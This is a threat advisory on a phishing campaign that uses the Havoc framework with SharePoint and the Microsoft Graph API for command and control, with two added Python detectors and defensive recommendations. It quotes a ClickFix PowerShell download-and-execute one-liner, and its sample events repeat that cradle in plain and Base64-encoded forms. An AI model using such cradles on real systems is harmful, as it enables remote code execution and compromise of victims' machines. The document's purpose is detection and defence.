Fortinet’s FortiGuard Labs has identified a new attack campaign leveraging Havoc, an open-source post-exploitation framework, to create a fully undetectable (FUD) Command and Control (C2) system using Microsoft SharePoint and the Microsoft Graph API. The threat actor uses SharePoint as a hosting platform for payloads, while the Graph API helps obscure malicious C2 communications within legitimate Microsoft services.
Severity Level: High
Threat Overview
1. Initial Access – Phishing Email
Delivery Method:
- Attack begins with a phishing email containing an HTML attachment named Documents.html.
- Uses ClickFix social engineering tactics to trick users into executing a malicious PowerShell command.
Execution Trigger:
- The victim opens the HTML file, which displays a fake error message instructing them to copy and paste a PowerShell command.
- Example of the PowerShell payload (defanged): powershell -w h -c "iwr hxxps://hao771[.]sharepoint.com/…|iex"
- The -w h flag hides the console window; iwr (Invoke-WebRequest) downloads a remote PowerShell script hosted on SharePoint and iex (Invoke-Expression) executes it in the same process.
2. Execution – PowerShell Loader
PowerShell Execution Steps:
- Decodes a Base64 payload embedded in the HTML file.
- Downloads an additional PowerShell script from SharePoint.
- Runs in hidden mode to avoid detection.
- Deletes registry entries under HKCU:\Software\Microsoft as an infection marker.
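The ClickFix one-liner and the hidden-window loader described above leave traces in two Windows logs: the launch flags in process-creation events (Event ID 4688, with command-line auditing enabled) and the script body in PowerShell Script Block Logging (Event ID 4104). The detector below is an added example written for this advisory, not code from Fortinet or the Havoc project. It runs over a few constructed events (the tenant name and paths are placeholders, not the campaign's) and also unwraps -EncodedCommand, so an encoded variant of the same download cradle is scored the same way as the plain one.

```python
import base64
import re

# Indicator regexes for the ClickFix launch described above. PowerShell is
# case-insensitive, so every pattern is too.
CRADLE = re.compile(
    r"\b(iwr|invoke-webrequest|irm|invoke-restmethod|downloadstring|downloadfile)\b", re.I)
PIPE_TO_IEX = re.compile(r"\|\s*(iex|invoke-expression)\b", re.I)
HIDDEN = re.compile(r"-w(?:indowstyle)?\s+h(?:idden)?\b", re.I)
SHAREPOINT = re.compile(r"https?://[a-z0-9-]+\.sharepoint\.com/", re.I)
ENCODED = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.I)


def refang(text):
    """Turn defanged IOC text (hxxps, [.]) back into what a log would contain."""
    return text.replace("hxxp", "http").replace("[.]", ".")


def decode_encoded_command(text):
    """Return the script hidden behind -EncodedCommand/-enc/-e (UTF-16LE), or None."""
    m = ENCODED.search(text)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def scan(text, depth=0):
    """Return the sorted indicator names found in one command line or script block."""
    text = refang(text)
    hits = set()
    if CRADLE.search(text) and PIPE_TO_IEX.search(text):
        hits.add("cradle_piped_to_iex")
    if HIDDEN.search(text):
        hits.add("hidden_window")
    if SHAREPOINT.search(text):
        hits.add("sharepoint_url")
    inner = decode_encoded_command(text)
    if inner is not None and depth < 3:  # bound nested -enc wrappers
        hits.add("encoded_command")
        hits.update(scan(inner, depth + 1))
    return sorted(hits)


def severity(hits):
    """A download cradle feeding Invoke-Expression is the decisive signal."""
    if "cradle_piped_to_iex" in hits:
        return "high"
    if len(hits) >= 2:
        return "medium"
    return "low" if hits else "none"


def triage(events):
    """Score each event; 'text' is CommandLine (4688) or ScriptBlockText (4104)."""
    results = []
    for e in events:
        hits = scan(e["text"])
        results.append({"id": e["id"], "source": e["source"],
                        "hits": hits, "severity": severity(hits)})
    return results


# Constructed sample events (placeholder tenant, not the campaign's URL).
_ENC = base64.b64encode(
    "iwr https://example-tenant.sharepoint.com/x|iex".encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"id": 1, "source": "4104",
     "text": r"Get-ChildItem C:\Logs -Filter *.log | Select-Object Name,Length"},
    {"id": 2, "source": "4688",
     "text": 'powershell -w h -c "iwr https://example-tenant.sharepoint.com/sites/docs/a.txt|iex"'},
    {"id": 3, "source": "4688", "text": "powershell -nop -w hidden -enc " + _ENC},
    {"id": 4, "source": "4104",
     "text": "Invoke-WebRequest -Uri https://example-tenant.sharepoint.com/sites/it/report.csv"
             " -OutFile C:\\Temp\\report.csv"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Event 4 shows why the cradle-to-iex pair, not the SharePoint URL alone, drives the severity: a plain Invoke-WebRequest that writes a file to disk is everyday admin activity and only scores low.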
3. Secondary Payload – Python Shellcode Loader
Python-based execution steps:
- Checks for a Python installation (pythonw.exe); if none is found, it downloads one.
- Executes a Python script (payload_20250107_015913.py) in hidden mode.
- The script acts as a shellcode loader, executing malicious payloads in memory.
Russian Debugging Strings Found:
- Выделение памяти (Memory allocation), Запись в память (Write to memory), and Выполнение shellcode (Execution of shellcode). These strings suggest a possible link to Russian-speaking threat actors.
4. C2 Communication – Microsoft Graph API
- The modified Havoc Demon DLL is executed and uses the Microsoft Graph API to reach its C2 endpoint, which is a SharePoint site rather than attacker-owned infrastructure.
- Hardcoded credentials embedded in the agent are used to obtain OAuth 2.0 tokens for Graph API authentication.
- The malware creates two files in SharePoint for C2 data exchange:
  - {VictimID}pD9-tKout: C2 commands (written by the attacker)
  - {VictimID}pD9-tKin: responses from the infected system
- Once C2 is established, the supported commands include gathering information about the target, file operations, command and payload execution, token manipulation, and Kerberos attacks.
- Stealth Factor: all traffic is encrypted and blends in with legitimate Microsoft Graph API activity to Microsoft-owned hosts, so network controls that trust Microsoft services see nothing unusual.
5. Data Exfiltration:
- Stolen credentials, system logs, and sensitive files are uploaded to SharePoint C2 servers using Microsoft Graph API PUT requests.
Covering Tracks:
- The malware deletes logs & temporary files to erase forensic evidence.
- C2 files {VictimID}pD9-tKout and {VictimID}pD9-tKin are removed after execution.
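Because both ends of the channel authenticate with the same hardcoded credentials, the operator's tasking writes and the implant's result writes appear in SharePoint audit data under one identity; what separates them is the client IP, the in/out direction in the file name, and the short gap between upload and deletion described under Covering Tracks. The example below is added for this advisory (not Fortinet's or Havoc's code) and runs over constructed Microsoft 365 unified audit log records reduced to a few fields (CreationTime, Operation, UserId, SourceFileName, ClientIP); the identity, IPs and victim ID in the sample are placeholders.

```python
import re
from datetime import datetime

# File naming convention reported for the C2 exchange on SharePoint:
# "{VictimID}pD9-tKout" carries tasking from the operator,
# "{VictimID}pD9-tKin" carries results from the implant.
C2_NAME = re.compile(r"^(?P<victim>.+)pD9-tK(?P<direction>in|out)$")


def find_c2_files(records):
    """Group audit records whose file name matches the convention, by VictimID."""
    per_victim = {}
    for r in records:
        m = C2_NAME.match(r.get("SourceFileName", ""))
        if not m:
            continue
        v = per_victim.setdefault(
            m["victim"], {"in": [], "out": [], "ips": set(), "users": set()})
        v[m["direction"]].append(
            (datetime.fromisoformat(r["CreationTime"]), r["Operation"]))
        v["ips"].add(r["ClientIP"])
        v["users"].add(r["UserId"])
    return per_victim


def file_lifetime_seconds(events):
    """Seconds from the first FileUploaded to the next FileDeleted, or None."""
    events = sorted(events)
    upload = next((t for t, op in events if op == "FileUploaded"), None)
    if upload is None:
        return None
    delete = next((t for t, op in events
                   if op == "FileDeleted" and t >= upload), None)
    return None if delete is None else (delete - upload).total_seconds()


def triage(records, max_lifetime=300):
    """One finding per VictimID, with the reasons it looks like a C2 exchange."""
    findings = []
    for victim, v in find_c2_files(records).items():
        reasons = ["c2_naming_convention"]
        if v["in"] and v["out"]:
            reasons.append("paired_in_out_files")
        lifetimes = [x for x in (file_lifetime_seconds(v["out"]),
                                 file_lifetime_seconds(v["in"])) if x is not None]
        if lifetimes and max(lifetimes) <= max_lifetime:
            reasons.append("short_lived_files")  # removed right after pickup
        if len(v["ips"]) > 1:
            reasons.append("same_identity_multiple_ips")  # operator and implant
        findings.append({"victim_id": victim, "users": sorted(v["users"]),
                         "client_ips": sorted(v["ips"]), "reasons": reasons,
                         "max_lifetime_s": max(lifetimes) if lifetimes else None})
    return findings


# Constructed unified audit log records (SharePoint workload), trimmed to the
# fields used here. Identity, IPs and VictimID are placeholders; 203.0.113.10
# plays the operator and 198.51.100.7 the infected host.
SAMPLE_RECORDS = [
    {"CreationTime": "2025-01-08T10:00:00", "Operation": "FileUploaded",
     "UserId": "alice@contoso.example", "SourceFileName": "Q1-budget.xlsx", "ClientIP": "192.0.2.15"},
    {"CreationTime": "2025-01-08T10:02:10", "Operation": "FileUploaded",
     "UserId": "svc-sync@contoso.example", "SourceFileName": "WS07-9f3apD9-tKout", "ClientIP": "203.0.113.10"},
    {"CreationTime": "2025-01-08T10:02:25", "Operation": "FileDownloaded",
     "UserId": "svc-sync@contoso.example", "SourceFileName": "WS07-9f3apD9-tKout", "ClientIP": "198.51.100.7"},
    {"CreationTime": "2025-01-08T10:02:26", "Operation": "FileDeleted",
     "UserId": "svc-sync@contoso.example", "SourceFileName": "WS07-9f3apD9-tKout", "ClientIP": "198.51.100.7"},
    {"CreationTime": "2025-01-08T10:02:40", "Operation": "FileUploaded",
     "UserId": "svc-sync@contoso.example", "SourceFileName": "WS07-9f3apD9-tKin", "ClientIP": "198.51.100.7"},
    {"CreationTime": "2025-01-08T10:02:55", "Operation": "FileDownloaded",
     "UserId": "svc-sync@contoso.example", "SourceFileName": "WS07-9f3apD9-tKin", "ClientIP": "203.0.113.10"},
    {"CreationTime": "2025-01-08T10:02:56", "Operation": "FileDeleted",
     "UserId": "svc-sync@contoso.example", "SourceFileName": "WS07-9f3apD9-tKin", "ClientIP": "203.0.113.10"},
    {"CreationTime": "2025-01-08T10:30:00", "Operation": "FileDeleted",
     "UserId": "alice@contoso.example", "SourceFileName": "Q1-budget.xlsx", "ClientIP": "192.0.2.15"},
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_RECORDS):
        print(finding)
```

The name pattern is the cheapest check and the one an operator can change most easily; the pairing of in/out files, their deletion seconds after pickup, and one identity acting from two client addresses survive a renamed suffix, so keep those reasons even if the regex stops firing.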
Recommendations
- Implement email filtering for suspicious HTML attachments.
- Disable or restrict PowerShell execution for non-administrative users.
- Use PowerShell Constrained Language Mode and enable Script Block Logging (Event ID 4104).
- Monitor Python script execution (python.exe, pythonw.exe) in sensitive environments.
- Restrict Microsoft Graph API access where not needed.
- Restrict API access to approved applications only.
- Use role-based access control (RBAC) to limit SharePoint and Graph API permissions.
- Keep Windows & Microsoft 365 Updated.
- Enforce OAuth 2.0 and disable outdated authentication methods (e.g., Basic Auth, NTLM).
- User Awareness: Train employees on phishing email detection and social engineering tactics. Warn against copying and pasting PowerShell commands from emails.
- Block the IOCs at their respective controls.
https://www.virustotal.com/gui/collection/9a99d459b54bbbd9a6dc5ebb130c7159ce017929164a797ceee650dbcb52061d/iocs
Source:
- https://www.fortinet.com/blog/threat-research/havoc-sharepoint-with-microsoft-graph-api-turns-into-fud-c2